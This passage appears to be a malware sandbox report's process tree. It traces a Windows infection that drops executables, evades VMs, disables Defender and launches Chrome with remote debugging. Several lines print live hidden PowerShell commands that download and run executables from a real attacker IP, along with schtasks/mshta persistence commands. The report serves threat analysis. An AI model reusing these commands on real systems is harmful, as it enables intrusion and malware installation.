        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2304 --field-trial-handle=1412,i,1293821778183661576,10053266614642875980,131072 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:2948
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1508 --field-trial-handle=1412,i,1293821778183661576,10053266614642875980,131072 /prefetch:2
        6⤵
        
        PID:1692
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2192 --field-trial-handle=1412,i,1293821778183661576,10053266614642875980,131072 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:1952
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1308 --field-trial-handle=1412,i,1293821778183661576,10053266614642875980,131072 /prefetch:8
        6⤵
        
        PID:1740
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3640 --field-trial-handle=1412,i,1293821778183661576,10053266614642875980,131072 /prefetch:8
        6⤵
        
        PID:1920
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1328 --field-trial-handle=1412,i,1293821778183661576,10053266614642875980,131072 /prefetch:8
        6⤵
        
        PID:2112
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1372 -s 556
      4⤵
      Loads dropped DLL
      Program crash
      PID:2756
- - C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe
    "C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2816
- - C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe
    "C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe"
    3⤵
    - Executes dropped EXE
    PID:1728
- - C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe
    "C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:2904
  - - C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe
      "C:\Users\Admin\AppData\Local\Temp\1087306001\YMci4Rc.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2856
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 500
      4⤵
      Loads dropped DLL
      Program crash
      PID:440
- - C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe
    "C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    PID:1604
  - - C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe
      "C:\Users\Admin\AppData\Local\Temp\1087345001\9aiiMOQ.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2232
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 500
      4⤵
      Loads dropped DLL
      Program crash
      PID:2372
- - C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe
    "C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:2608
  - - C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe
      "C:\Users\Admin\AppData\Local\Temp\1087623001\NL58452.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:296
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2608 -s 500
      4⤵
      Loads dropped DLL
      Program crash
      PID:2068
- - C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe
    "C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:2356
  - - C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe
      "C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2548
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2356 -s 500
      4⤵
      Loads dropped DLL
      Program crash
      PID:2968
- - C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe
    "C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2536
- - C:\Users\Admin\AppData\Local\Temp\1088667001\amnew.exe
    "C:\Users\Admin\AppData\Local\Temp\1088667001\amnew.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    PID:2712
  - - C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
      "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
      4⤵
      Downloads MZ/PE file
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies system certificate store
      PID:2804
    - - C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:3048
      - C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
        6⤵
        Executes dropped EXE
        
        PID:1984
      - C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        
        PID:2532
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3048 -s 564
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:2052
    - - C:\Users\Admin\AppData\Local\Temp\10009190101\6610a02fea.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10009190101\6610a02fea.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:2616
    - - C:\Users\Admin\AppData\Local\Temp\10009200101\b48baaab9c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10009200101\b48baaab9c.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:3484
      - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        6⤵
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        
        PID:4016
- - C:\Users\Admin\AppData\Local\Temp\1088694101\221457afdd.exe
    "C:\Users\Admin\AppData\Local\Temp\1088694101\221457afdd.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1072
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn EDMivma1TWu /tr "mshta C:\Users\Admin\AppData\Local\Temp\LnB8583DG.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1228
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn EDMivma1TWu /tr "mshta C:\Users\Admin\AppData\Local\Temp\LnB8583DG.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:288
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\LnB8583DG.hta
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      PID:2520
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1296
      - C:\Users\Admin\AppData\Local\TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE
        
        "C:\Users\Admin\AppData\Local\TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE"
        6⤵
        Modifies Windows Defender DisableAntiSpyware settings
        Modifies Windows Defender Real-time Protection settings
        Modifies Windows Defender TamperProtection settings
        Modifies Windows Defender notification settings
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2564
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\1088695021\am_no.cmd" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2324
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1088695021\am_no.cmd" any_word
      4⤵
      PID:612
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:1176
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2876
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1416
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1228
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2088
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1320
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1232
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "onvgcmaGhjM" /tr "mshta \"C:\Temp\tolON6waI.hta\"" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2628
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\tolON6waI.hta"
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:568
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2060
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:2148
- - C:\Users\Admin\AppData\Local\Temp\1088713001\8f9cdc126e.exe
    "C:\Users\Admin\AppData\Local\Temp\1088713001\8f9cdc126e.exe"
    3⤵
    - Enumerates VirtualBox registry keys
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:1812
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:888
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7789758,0x7fef7789768,0x7fef7789778
        5⤵
        
        PID:2108
    - - C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        5⤵
        
        PID:544
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1100 --field-trial-handle=1304,i,2549596014739685930,11965197580315190746,131072 /prefetch:2
        5⤵
        
        PID:2096
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1020 --field-trial-handle=1304,i,2549596014739685930,11965197580315190746,131072 /prefetch:8
        5⤵
        
        PID:2340
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1492 --field-trial-handle=1304,i,2549596014739685930,11965197580315190746,131072 /prefetch:8
        5⤵
        
        PID:2808
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2204 --field-trial-handle=1304,i,2549596014739685930,11965197580315190746,131072 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:288
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2216 --field-trial-handle=1304,i,2549596014739685930,11965197580315190746,131072 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:608
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1096 --field-trial-handle=1304,i,2549596014739685930,11965197580315190746,131072 /prefetch:2
        5⤵
        
        PID:2616
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1864 --field-trial-handle=1304,i,2549596014739685930,11965197580315190746,131072 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:2408
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3560 --field-trial-handle=1304,i,2549596014739685930,11965197580315190746,131072 /prefetch:8
        5⤵
        
        PID:3128
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3692 --field-trial-handle=1304,i,2549596014739685930,11965197580315190746,131072 /prefetch:8
        5⤵
        
        PID:3144
  - - C:\Users\Admin\AppData\Local\Temp\service123.exe
      "C:\Users\Admin\AppData\Local\Temp\service123.exe"
      4⤵
      Executes dropped EXE
      PID:3616
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:1824
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 972
      4⤵
      Program crash
      PID:860
- - C:\Users\Admin\AppData\Local\Temp\1088714001\f1c548477b.exe
    "C:\Users\Admin\AppData\Local\Temp\1088714001\f1c548477b.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2560
- - C:\Users\Admin\AppData\Local\Temp\1088715001\3a3b5fb167.exe
    "C:\Users\Admin\AppData\Local\Temp\1088715001\3a3b5fb167.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2416
- - C:\Users\Admin\AppData\Local\Temp\1088716001\Bjkm5hE.exe
    "C:\Users\Admin\AppData\Local\Temp\1088716001\Bjkm5hE.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:1776
  - - C:\Users\Admin\AppData\Local\Temp\1088716001\Bjkm5hE.exe
      "C:\Users\Admin\AppData\Local\Temp\1088716001\Bjkm5hE.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1728
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1776 -s 560
      4⤵
      Program crash
      PID:1936
- - C:\Users\Admin\AppData\Local\Temp\1088717001\NL58452.exe
    "C:\Users\Admin\AppData\Local\Temp\1088717001\NL58452.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:900
  - - C:\Users\Admin\AppData\Local\Temp\1088717001\NL58452.exe
      "C:\Users\Admin\AppData\Local\Temp\1088717001\NL58452.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1888
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 900 -s 504
      4⤵
      Program crash
      PID:2240
- - C:\Users\Admin\AppData\Local\Temp\1088718001\dzvh4HC.exe
    "C:\Users\Admin\AppData\Local\Temp\1088718001\dzvh4HC.exe"
    3⤵
    - Executes dropped EXE
    PID:3392
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1088719041\tYliuwV.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3652
- - C:\Users\Admin\AppData\Local\Temp\1088720001\7aencsM.exe
    "C:\Users\Admin\AppData\Local\Temp\1088720001\7aencsM.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:3796
  - - C:\Users\Admin\AppData\Local\Temp\1088720001\7aencsM.exe
      "C:\Users\Admin\AppData\Local\Temp\1088720001\7aencsM.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      PID:3832
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious use of AdjustPrivilegeToken
        
        PID:2904
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7639758,0x7fef7639768,0x7fef7639778
        6⤵
        
        PID:1912
      - C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        6⤵
        
        PID:3396
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1156 --field-trial-handle=1304,i,18201436501929925413,2426104937910798036,131072 /prefetch:2
        6⤵
        
        PID:1696
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1532 --field-trial-handle=1304,i,18201436501929925413,2426104937910798036,131072 /prefetch:8
        6⤵
        
        PID:1340
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1608 --field-trial-handle=1304,i,18201436501929925413,2426104937910798036,131072 /prefetch:8
        6⤵
        
        PID:3240
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2248 --field-trial-handle=1304,i,18201436501929925413,2426104937910798036,131072 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:2240
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2264 --field-trial-handle=1304,i,18201436501929925413,2426104937910798036,131072 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:2352
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
